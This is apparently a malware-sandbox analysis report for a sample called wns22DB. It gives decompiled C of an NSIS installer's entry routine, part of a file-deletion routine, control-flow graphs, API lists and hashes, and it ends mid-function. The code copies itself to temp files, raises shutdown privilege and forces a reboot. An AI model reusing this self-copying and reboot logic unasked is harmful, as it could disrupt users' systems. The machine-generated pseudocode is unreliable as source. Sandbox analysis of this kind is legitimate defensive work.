call 4067c2 68->78 81 4039d8 69->81 82 4039dc-4039e0 ExitProcess 69->82 71->29 77->78 92 4039ba-4039c5 ExitWindowsEx 78->92 93 4039ae-4039b8 78->93 80->56 81->82 89 4037b9-4037bd 84->89 86 403840-403854 call 4059b9 lstrcatW 85->86 87 4037da-4037e8 call 405dc5 85->87 100 403861-40387b lstrcatW lstrcmpiW 86->100 101 403856-40385c lstrcatW 86->101 87->56 102 4037ea-403800 call 4063e8 * 2 87->102 94 4037c6-4037ca 89->94 95 4037bf-4037c4 89->95 92->69 99 4039c7-4039c9 call 40140b 92->99 93->92 93->99 94->89 96 4037cc 94->96 95->94 95->96 96->85 99->69 100->56 105 40387d-403880 100->105 101->100 102->62 107 403882-403887 call 40591f 105->107 108 403889 call 40599c 105->108 115 40388e-40389c SetCurrentDirectoryW 107->115 108->115 116 4038a9-4038d2 call 4063e8 115->116 117 40389e-4038a4 call 4063e8 115->117 121 4038d7-4038f3 call 40640a DeleteFileW 116->121 117->116 124 403934-40393c 121->124 125 4038f5-403905 CopyFileW 121->125 124->121 127 40393e-403945 call 4061ae 124->127 125->124 126 403907-403927 call 4061ae call 40640a call 4059d1 125->126 126->124 136 403929-403930 CloseHandle 126->136 127->56 136->124
                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                  			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				short* _t62;
				void* _t65;
				void* _t67;
				int _t69;
				int _t70;
				int _t73;
				intOrPtr* _t74;
				int _t75;
				int _t77;
				void* _t101;
				signed int _t118;
				void* _t121;
				void* _t126;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr* _t147;
				int _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				signed int _t173;
				signed int _t176;
				CHAR* _t177;
				void* _t180;
				int* _t182;
				void* _t190;
				void* _t194;
				void* _t195;

				_t169 = 0x20;
				_t149 = 0;
				 *(_t195 + 0x14) = 0;
				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t195 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x47024c = _t51;
				if(_t51 != 6) {
					_t147 = E004067C2(0);
					if(_t147 != 0) {
						 *_t147(0xc00);
					}
				}
				_t177 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t190);
				__imp__OleInitialize(_t149); // executed
				 *0x470318 = _t56;
				SHGetFileInfoW(0x4366e8, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
				E004063E8(0x468240, L"NSIS Error");
				E004063E8(0x4c1000, GetCommandLineW());
				 *0x470240 = 0x400000;
				_t62 = 0x4c1000;
				if( *0x4c1000 == 0x22) {
					_t62 = 0x4c1002;
					_t169 = 0x22;
				}
				_t153 = CharNextW(E00405CEA(_t62, _t169));
				 *(_t195 + 0x18) = _t153;
				_t65 =  *_t153;
				if(_t65 == _t149) {
					L33:
					GetTempPathW(0x2000, 0x4d5000);
					_t67 = E00403474(_t153, 0);
					_t223 = _t67;
					if(_t67 != 0) {
						L36:
						DeleteFileW(0x4d1000); // executed
						_t69 = E00402F30(_t225,  *(_t195 + 0x1c)); // executed
						 *(_t195 + 0x10) = _t69;
						if(_t69 != _t149) {
							L48:
							ExitProcess(); // executed
							__imp__OleUninitialize(); // executed
							_t237 =  *(_t195 + 0x10) - _t149;
							if( *(_t195 + 0x10) == _t149) {
								__eflags =  *0x4702f4 - _t149;
								if( *0x4702f4 == _t149) {
									L72:
									_t70 =  *0x47030c;
									__eflags = _t70 - 0xffffffff;
									if(_t70 != 0xffffffff) {
										 *(_t195 + 0x10) = _t70;
									}
									ExitProcess( *(_t195 + 0x10));
								}
								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
								__eflags = _t73;
								if(_t73 != 0) {
									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
									 *(_t195 + 0x34) = 1;
									 *(_t195 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
								}
								_t74 = E004067C2(4);
								__eflags = _t74 - _t149;
								if(_t74 == _t149) {
									L70:
									_t75 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t75;
									if(_t75 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
									__eflags = _t77;
									if(_t77 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E00405A4E( *(_t195 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x470260 == _t149) {
							L47:
							 *0x47030c =  *0x47030c | 0xffffffff;
							 *(_t195 + 0x14) = E00403AD8( *0x47030c);
							goto L48;
						}
						_t182 = E00405CEA(0x4c1000, _t149);
						if(_t182 < 0x4c1000) {
							L44:
							_t234 = _t182 - 0x4c1000;
							 *(_t195 + 0x10) = L"Error launching installer";
							if(_t182 < 0x4c1000) {
								_t180 = E004059B9(_t237);
								lstrcatW(0x4d5000, L"~nsu");
								if(_t180 != _t149) {
									lstrcatW(0x4d5000, "A");
								}
								lstrcatW(0x4d5000, L".tmp");
								if(lstrcmpiW(0x4d5000, 0x4cd000) != 0) {
									_push(0x4d5000);
									if(_t180 == _t149) {
										E0040599C();
									} else {
										E0040591F();
									}
									SetCurrentDirectoryW(0x4d5000);
									if( *0x4c5000 == _t149) {
										E004063E8(0x4c5000, 0x4cd000);
									}
									E004063E8(L"start OK\r\n",  *(_t195 + 0x18));
									_t154 = "A" & 0x0000ffff;
									 *0x475000 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t194 = 0x1a;
									do {
										E0040640A(_t149, 0x4d5000, 0x4326e8, 0x4326e8,  *((intOrPtr*)( *0x470254 + 0x120)));
										DeleteFileW(0x4326e8);
										if( *(_t195 + 0x10) != _t149 && CopyFileW(0x4dd000, 0x4326e8, 1) != 0) {
											E004061AE(_t154, 0x4326e8, _t149);
											E0040640A(_t149, 0x4d5000, 0x4326e8, 0x4326e8,  *((intOrPtr*)( *0x470254 + 0x124)));
											_t101 = E004059D1(0x4326e8);
											if(_t101 != _t149) {
												CloseHandle(_t101);
												 *(_t195 + 0x10) = _t149;
											}
										}
										 *0x475000 =  *0x475000 + 1;
										_t194 = _t194 - 1;
									} while (_t194 != 0);
									E004061AE(_t154, 0x4d5000, _t149);
								}
								goto L48;
							}
							 *_t182 = _t149;
							_t183 =  &(_t182[2]);
							if(E00405DC5(_t234,  &(_t182[2])) == 0) {
								goto L48;
							}
							E004063E8(0x4c5000, _t183);
							E004063E8(0x4c9000, _t183);
							 *(_t195 + 0x10) = _t149;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t182 != _t157 || _t182[1] != _t118) {
							_t182 = _t182;
							if(_t182 >= 0x4c1000) {
								continue;
							}
							break;
						}
						_t149 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(0x4d5000, 0x1ffb);
					lstrcatW(0x4d5000, L"\\Temp");
					_t121 = E00403474(_t153, _t223);
					_t224 = _t121;
					if(_t121 != 0) {
						goto L36;
					}
					GetTempPathW(0x1ffc, 0x4d5000);
					lstrcatW(0x4d5000, L"Low");
					SetEnvironmentVariableW(L"TEMP", 0x4d5000);
					SetEnvironmentVariableW(L"TMP", 0x4d5000);
					_t126 = E00403474(_t153, _t224);
					_t225 = _t126;
					if(_t126 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t152 = 0x20;
						if(_t65 != _t152) {
							L13:
							if( *_t153 == 0x22) {
								_t153 = _t153 + 2;
								_t152 = 0x22;
							}
							if( *_t153 != 0x2f) {
								goto L27;
							} else {
								_t153 = _t153 + 2;
								if( *_t153 == 0x53) {
									_t146 =  *((intOrPtr*)(_t153 + 2));
									if(_t146 == 0x20 || _t146 == 0) {
										 *0x470300 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t167 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t173 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
								if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t173) {
									_t145 =  *((intOrPtr*)(_t153 + 8));
									if(_t145 == 0x20 || _t145 == 0) {
										 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t162 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t176 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
								if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t176) {
									goto L27;
								} else {
									 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
									__eflags = _t153;
									E004063E8(0x4c5000, _t153);
									L32:
									_t149 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t153 = _t153 + 2;
						} while ( *_t153 == _t152);
						goto L13;
						L27:
						_t153 = E00405CEA(_t153, _t152);
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
						}
						_t65 =  *_t153;
					} while (_t65 != 0);
					goto L32;
				}
				L4:
				E00406752(_t177); // executed
				_t177 =  &(_t177[lstrlenA(_t177) + 1]);
				if( *_t177 != 0) {
					goto L4;
				} else {
					E004067C2(0xa);
					 *0x470244 = E004067C2(8);
					_t56 = E004067C2(6);
					if(_t56 != _t149) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x47024f =  *0x47024f | 0x00000040;
						}
					}
					goto L8;
				}
			}




































                                                                                                                                                                                                  0x004034b0
                                                                                                                                                                                                  0x004034b1
                                                                                                                                                                                                  0x004034b8
                                                                                                                                                                                                  0x004034bc
                                                                                                                                                                                                  0x004034c4
                                                                                                                                                                                                  0x004034c8
                                                                                                                                                                                                  0x004034d4
                                                                                                                                                                                                  0x004034dd
                                                                                                                                                                                                  0x004034e2
                                                                                                                                                                                                  0x004034e5
                                                                                                                                                                                                  0x004034ec
                                                                                                                                                                                                  0x004034f3
                                                                                                                                                                                                  0x004034f3
                                                                                                                                                                                                  0x004034ec
                                                                                                                                                                                                  0x004034f5
                                                                                                                                                                                                  0x004034f5
                                                                                                                                                                                                  0x0040353d
                                                                                                                                                                                                  0x0040353e
                                                                                                                                                                                                  0x00403545
                                                                                                                                                                                                  0x0040354b
                                                                                                                                                                                                  0x00403561
                                                                                                                                                                                                  0x00403571
                                                                                                                                                                                                  0x00403583
                                                                                                                                                                                                  0x00403590
                                                                                                                                                                                                  0x0040359a
                                                                                                                                                                                                  0x0040359c
                                                                                                                                                                                                  0x004035a0
                                                                                                                                                                                                  0x004035a5
                                                                                                                                                                                                  0x004035a5
                                                                                                                                                                                                  0x004035b4
                                                                                                                                                                                                  0x004035b6
                                                                                                                                                                                                  0x004035ba
                                                                                                                                                                                                  0x004035c0
                                                                                                                                                                                                  0x004036d7
                                                                                                                                                                                                  0x004036e8
                                                                                                                                                                                                  0x004036ea
                                                                                                                                                                                                  0x004036ef
                                                                                                                                                                                                  0x004036f1
                                                                                                                                                                                                  0x00403749
                                                                                                                                                                                                  0x0040374e
                                                                                                                                                                                                  0x00403758
                                                                                                                                                                                                  0x0040375f
                                                                                                                                                                                                  0x00403763
                                                                                                                                                                                                  0x00403814
                                                                                                                                                                                                  0x00403814
                                                                                                                                                                                                  0x00403819
                                                                                                                                                                                                  0x0040381f
                                                                                                                                                                                                  0x00403824
                                                                                                                                                                                                  0x0040394a
                                                                                                                                                                                                  0x00403950
                                                                                                                                                                                                  0x004039ce
                                                                                                                                                                                                  0x004039ce
                                                                                                                                                                                                  0x004039d3
                                                                                                                                                                                                  0x004039d6
                                                                                                                                                                                                  0x004039d8
                                                                                                                                                                                                  0x004039d8
                                                                                                                                                                                                  0x004039e0
                                                                                                                                                                                                  0x004039e0
                                                                                                                                                                                                  0x00403960
                                                                                                                                                                                                  0x00403966
                                                                                                                                                                                                  0x00403968
                                                                                                                                                                                                  0x00403975
                                                                                                                                                                                                  0x00403988
                                                                                                                                                                                                  0x00403990
                                                                                                                                                                                                  0x00403998
                                                                                                                                                                                                  0x00403998
                                                                                                                                                                                                  0x004039a0
                                                                                                                                                                                                  0x004039a5
                                                                                                                                                                                                  0x004039ac
                                                                                                                                                                                                  0x004039ba
                                                                                                                                                                                                  0x004039bd
                                                                                                                                                                                                  0x004039c3
                                                                                                                                                                                                  0x004039c5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004039ae
                                                                                                                                                                                                  0x004039b4
                                                                                                                                                                                                  0x004039b6
                                                                                                                                                                                                  0x004039b8
                                                                                                                                                                                                  0x004039c7
                                                                                                                                                                                                  0x004039c9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004039c9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004039b8
                                                                                                                                                                                                  0x004039ac
                                                                                                                                                                                                  0x00403833
                                                                                                                                                                                                  0x0040383a
                                                                                                                                                                                                  0x0040383a
                                                                                                                                                                                                  0x0040376f
                                                                                                                                                                                                  0x00403804
                                                                                                                                                                                                  0x00403804
                                                                                                                                                                                                  0x00403810
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403810
                                                                                                                                                                                                  0x0040377c
                                                                                                                                                                                                  0x00403780
                                                                                                                                                                                                  0x004037ce
                                                                                                                                                                                                  0x004037ce
                                                                                                                                                                                                  0x004037d0
                                                                                                                                                                                                  0x004037d8
                                                                                                                                                                                                  0x0040384b
                                                                                                                                                                                                  0x0040384d
                                                                                                                                                                                                  0x00403854
                                                                                                                                                                                                  0x0040385c
                                                                                                                                                                                                  0x0040385c
                                                                                                                                                                                                  0x00403867
                                                                                                                                                                                                  0x0040387b
                                                                                                                                                                                                  0x0040387f
                                                                                                                                                                                                  0x00403880
                                                                                                                                                                                                  0x00403889
                                                                                                                                                                                                  0x00403882
                                                                                                                                                                                                  0x00403882
                                                                                                                                                                                                  0x00403882
                                                                                                                                                                                                  0x0040388f
                                                                                                                                                                                                  0x0040389c
                                                                                                                                                                                                  0x004038a4
                                                                                                                                                                                                  0x004038a4
                                                                                                                                                                                                  0x004038b2
                                                                                                                                                                                                  0x004038be
                                                                                                                                                                                                  0x004038cc
                                                                                                                                                                                                  0x004038d1
                                                                                                                                                                                                  0x004038d7
                                                                                                                                                                                                  0x004038e3
                                                                                                                                                                                                  0x004038e9
                                                                                                                                                                                                  0x004038f3
                                                                                                                                                                                                  0x00403909
                                                                                                                                                                                                  0x0040391a
                                                                                                                                                                                                  0x00403920
                                                                                                                                                                                                  0x00403927
                                                                                                                                                                                                  0x0040392a
                                                                                                                                                                                                  0x00403930
                                                                                                                                                                                                  0x00403930
                                                                                                                                                                                                  0x00403927
                                                                                                                                                                                                  0x00403934
                                                                                                                                                                                                  0x0040393b
                                                                                                                                                                                                  0x0040393b
                                                                                                                                                                                                  0x00403940
                                                                                                                                                                                                  0x00403940
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040387b
                                                                                                                                                                                                  0x004037da
                                                                                                                                                                                                  0x004037dd
                                                                                                                                                                                                  0x004037e8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004037f0
                                                                                                                                                                                                  0x004037fb
                                                                                                                                                                                                  0x00403800
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403800
                                                                                                                                                                                                  0x00403789
                                                                                                                                                                                                  0x004037a1
                                                                                                                                                                                                  0x004037b2
                                                                                                                                                                                                  0x004037b3
                                                                                                                                                                                                  0x004037b7
                                                                                                                                                                                                  0x004037b9
                                                                                                                                                                                                  0x004037c7
                                                                                                                                                                                                  0x004037ca
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004037ca
                                                                                                                                                                                                  0x004037cc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004037cc
                                                                                                                                                                                                  0x004036f9
                                                                                                                                                                                                  0x00403705
                                                                                                                                                                                                  0x0040370a
                                                                                                                                                                                                  0x0040370f
                                                                                                                                                                                                  0x00403711
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403719
                                                                                                                                                                                                  0x00403721
                                                                                                                                                                                                  0x00403732
                                                                                                                                                                                                  0x0040373a
                                                                                                                                                                                                  0x0040373c
                                                                                                                                                                                                  0x00403741
                                                                                                                                                                                                  0x00403743
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004035c6
                                                                                                                                                                                                  0x004035c6
                                                                                                                                                                                                  0x004035c8
                                                                                                                                                                                                  0x004035cc
                                                                                                                                                                                                  0x004035d5
                                                                                                                                                                                                  0x004035d9
                                                                                                                                                                                                  0x004035de
                                                                                                                                                                                                  0x004035df
                                                                                                                                                                                                  0x004035df
                                                                                                                                                                                                  0x004035e4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004035ea
                                                                                                                                                                                                  0x004035eb
                                                                                                                                                                                                  0x004035f0
                                                                                                                                                                                                  0x004035f2
                                                                                                                                                                                                  0x004035fa
                                                                                                                                                                                                  0x00403601
                                                                                                                                                                                                  0x00403601
                                                                                                                                                                                                  0x004035fa
                                                                                                                                                                                                  0x00403612
                                                                                                                                                                                                  0x00403625
                                                                                                                                                                                                  0x00403626
                                                                                                                                                                                                  0x0040363b
                                                                                                                                                                                                  0x00403640
                                                                                                                                                                                                  0x00403644
                                                                                                                                                                                                  0x0040364d
                                                                                                                                                                                                  0x00403655
                                                                                                                                                                                                  0x0040365c
                                                                                                                                                                                                  0x0040365c
                                                                                                                                                                                                  0x00403655
                                                                                                                                                                                                  0x00403668
                                                                                                                                                                                                  0x0040367b
                                                                                                                                                                                                  0x0040367c
                                                                                                                                                                                                  0x00403691
                                                                                                                                                                                                  0x00403697
                                                                                                                                                                                                  0x0040369b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004036c2
                                                                                                                                                                                                  0x004036c2
                                                                                                                                                                                                  0x004036c7
                                                                                                                                                                                                  0x004036d0
                                                                                                                                                                                                  0x004036d5
                                                                                                                                                                                                  0x004036d5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004036d5
                                                                                                                                                                                                  0x0040369b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004035ce
                                                                                                                                                                                                  0x004035ce
                                                                                                                                                                                                  0x004035cf
                                                                                                                                                                                                  0x004035d0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004036a3
                                                                                                                                                                                                  0x004036aa
                                                                                                                                                                                                  0x004036b0
                                                                                                                                                                                                  0x004036b3
                                                                                                                                                                                                  0x004036b3
                                                                                                                                                                                                  0x004036b4
                                                                                                                                                                                                  0x004036b7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004036c0
                                                                                                                                                                                                  0x004034fa
                                                                                                                                                                                                  0x004034fb
                                                                                                                                                                                                  0x00403507
                                                                                                                                                                                                  0x0040350e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403510
                                                                                                                                                                                                  0x00403512
                                                                                                                                                                                                  0x00403520
                                                                                                                                                                                                  0x00403525
                                                                                                                                                                                                  0x0040352c
                                                                                                                                                                                                  0x00403530
                                                                                                                                                                                                  0x00403534
                                                                                                                                                                                                  0x00403536
                                                                                                                                                                                                  0x00403536
                                                                                                                                                                                                  0x00403534
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040352c

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(004366E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                                  • CharNextW.USER32(00000000,004C1000,00000020,004C1000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00002000,004D5000,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004D5000,00001FFB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                                  • lstrcatW.KERNEL32(004D5000,\Temp), ref: 00403705
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00001FFC,004D5000,004D5000,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                                  • lstrcatW.KERNEL32(004D5000,Low), ref: 00403721
                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,004D5000,004D5000,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,004D5000,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(004D1000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                                  • lstrcatW.KERNEL32(004D5000,~nsu), ref: 0040384D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(004D5000,0040A328), ref: 0040385C
                                                                                                                                                                                                  • lstrcatW.KERNEL32(004D5000,.tmp), ref: 00403867
                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(004D5000,004CD000,004D5000,.tmp,004D5000,~nsu,004C1000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004D5000,004D5000,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(004326E8,004326E8,?,start OK,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                                  • CopyFileW.KERNEL32(004DD000,004326E8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,004326E8,004326E8,?,004326E8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                  • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$start OK$~nsu$&C
                                                                                                                                                                                                  • API String ID: 424501083-3895494604
                                                                                                                                                                                                  • Opcode ID: f53affb97ce786d659da796e96bdb87e4451feeb6c24bf85a4d3977c79a12d6f
                                                                                                                                                                                                  • Instruction ID: a55e1ba19ca46540f0e819ab7f1242b390505e394ddfc82397b04f5546c7078a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f53affb97ce786d659da796e96bdb87e4451feeb6c24bf85a4d3977c79a12d6f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63D1D671600310AAD7206F769D49B3B3AACEB4074AF10443FF985B62D2DBBD8D45876E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 344 405afa-405b20 call 405dc5 347 405b22-405b34 DeleteFileW 344->347 348 405b39-405b40 344->348 349 405cb6-405cba 347->349 350 405b42-405b44 348->350 351 405b53-405b63 call 4063e8 348->351 353 405c64-405c69 350->353 354 405b4a-405b4d 350->354 357 405b72-405b73 call 405d09 351->357 358 405b65-405b70 lstrcatW 351->358 353->349 356 405c6b-405c6e 353->356 354->351 354->353 359 405c70-405c76 356->359 360 405c78-405c80 call 40672b 356->360 361 405b78-405b7c 357->361 358->361 359->349 360->349 368 405c82-405c96 call 405cbd call 405ab2 360->368 364 405b88-405b8e lstrcatW 361->364 365 405b7e-405b86 361->365 367 405b93-405baf lstrlenW FindFirstFileW 364->367 365->364 365->367 369 405bb5-405bbd 367->369 370 405c59-405c5d 367->370 384 405c98-405c9b 368->384 385 405cae-405cb1 call 405450 368->385 373 405bdd-405bf1 call 4063e8 369->373 374 405bbf-405bc7 369->374 370->353 372 405c5f 370->372 372->353 386 405bf3-405bfb 373->386 387 405c08-405c13 call 405ab2 373->387 376 405bc9-405bd1 374->376 377 405c3c-405c4c FindNextFileW 374->377 376->373 382 405bd3-405bdb 376->382 377->369 381 405c52-405c53 FindClose 377->381 381->370 382->373 382->377 384->359 388 405c9d-405cac call 405450 call 4061ae 384->388 385->349 386->377 389 405bfd-405c06 call 405afa 386->389 397 405c34-405c37 call 405450 387->397 398 405c15-405c18 387->398 388->349 389->377 397->377 401 405c1a-405c2a call 405450 call 4061ae 398->401 402 405c2c-405c32 398->402 401->377 402->377
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00405AFA(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405DC5(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x4702e8 =  *0x4702e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
